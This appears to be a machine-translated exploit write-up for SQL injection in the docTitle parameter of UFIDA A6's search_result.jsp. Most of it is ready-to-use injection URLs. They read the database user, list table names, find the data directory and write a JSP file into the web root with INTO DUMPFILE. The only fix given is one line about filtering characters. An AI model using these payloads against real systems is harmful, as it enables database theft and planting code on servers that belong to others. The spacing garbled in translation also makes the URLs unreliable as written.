UFIDA A6 collaborative management of SQL Injection

Inject the docTitle parameter in the search_result.jsp File
Http://xxxxxx.com/yyoa/oaSearch/search_result.jsp? DocType = Collaborative Information & docTitle = 1' and/**/1 = 2/**/union/**/all/**/select/**/user (), 2, 3, 4, 5% 23 & goal = 1 & perId = 0 & startTime = & endTime = & keyword = & searchArea = notArc







Query Table Name:

Http: // xxxxxx.com/yyoa/oaSearch/search_result.jsp? DocType = Collaborative Information & docTitle = test' and/**/1 = 2/**/union/**/all/**/select/**/group_concat (table_name), 2, 3, 4, 5/**/from/**/information_schema.tables % 23 & goal = 1 & perId = 0 & startTime = & endTime = & keyword = & searchArea = notArc





Because the program is integrated with the default installation, you can guess the WEB path:

Http://xxxxxx.com/yyoa/oaSearch/search_result.jsp? DocType = Collaborative Information & docTitle = test' and/**/1 = 2/**/union/**/all/**/select/**/@ datadir, 2, 3, 4, 5% 23 & goal = 1 & perId = 0 & startTime = & endTime = & keyword = & searchArea = notArc



Based on the OA installation path information found on the Internet, the following WEB path is spliced:

D: \ UFseeyon \ OA \ tomcat \ webapps \ yyoa



Direct dumpfile file:

Http://xxxxxx.com/yyoa/oaSearch/search_result.jsp? DocType = Collaborative Information & docTitle = test' and/**/1 = 2/**/union/**/all/**/select/**/'test ', 2, 3, 4, 5/**/into/**/dumpfile/**/'d:/UFseeyon/OA/tomcat/webapps/yyoa/test. jsp '/**/from/**/mysql. user/**/limit/**/1% 23 & goal = 1 & perId = 0 & startTime = & endTime = & keyword = & searchArea = notArc



Solution:

Filter dangerous characters